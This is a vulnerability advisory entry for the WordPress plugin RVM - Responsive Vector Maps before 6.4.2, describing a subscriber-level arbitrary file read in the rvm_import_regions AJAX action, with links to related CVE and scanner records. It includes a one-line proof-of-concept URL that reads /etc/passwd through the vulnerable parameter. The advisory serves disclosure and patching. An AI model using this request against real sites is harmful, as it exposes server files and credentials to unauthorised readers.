Lucene search
Krzysztof ZającWPEX-ID:C6BB12B1-6961-40BD-9110-EDFA9EE41A18HistoryJan 06, 2022 - 12:00 a.m.
RVM - Responsive Vector Maps < 6.4.2 - Subscriber+ Arbitrary File Read
2022-01-0600:00:00
Krzysztof Zając
70
0.003 Low
EPSS
Percentile
68.7%
The plugin does not have proper authorisation, CSRF checks and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user, such as subscriber, to read arbitrary files on the web server
As a subscriber, open https://example.com/wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd and view the source to get the data
Related
prion
prion
Cross site request forgery (csrf)
2022-02-07 16:15:00
cvelist
cvelist
nvd
nvd
CVE-2021-24947
2022-02-07 16:15:43
nuclei
nuclei
WordPress Responsive Vector Maps < 6.4.2 - Arbitrary File Read
2022-02-08 01:07:19
wpvulndb
wpvulndb
RVM - Responsive Vector Maps < 6.4.2 - Subscriber+ Arbitrary File Read
2022-01-06 00:00:00
cve
cve
CVE-2021-24947
2022-02-07 16:15:43
patchstack
patchstack
kitploit
kitploit
Wpgarlic - A Proof-Of-Concept WordPress Plugin Fuzzer
2022-04-25 21:30:00